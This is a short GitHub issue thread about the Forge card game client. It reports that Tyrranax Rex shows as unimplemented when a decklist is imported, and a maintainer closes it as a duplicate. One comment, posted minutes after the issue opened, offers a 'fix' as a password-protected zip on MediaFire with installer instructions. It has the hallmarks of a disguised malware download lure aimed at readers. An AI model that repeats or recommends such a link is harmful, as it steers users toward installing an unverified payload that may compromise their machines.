### ISSUE TITLE
Tyrranax Rex cannot be imported.

### ISSUE THREAD

**Issue by stormcat664** [Card-Forge/forge#6003] opened 2024-08-28 14:08 UTC
**Describe the bug**
When importing a decklist containing Tyrranax Rex, it was shown as an unimplemented card.
However, in practice, it is implemented

**To Reproduce**
1. Import a deck list containing Tyrranax Rex.

**Expected behavior**
Imported successfully.

**Screenshots**
![image](https://github.com/user-attachments/assets/53a079a7-2204-41c6-b52b-6b5484fba232)

**Desktop (please complete the following information):**
 - OS: Windows 10
 - Browser Firefox
 - Version forge-gui-desktop-1.6.65-SNAPSHOT-08-27

**Comment by scheichreisuli** [comment] 2024-08-28 14:11
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Hanmac** [comment] 2024-08-28 14:54
Duplicate of #5941

**Closed** 2024-08-28 15:03 UTC
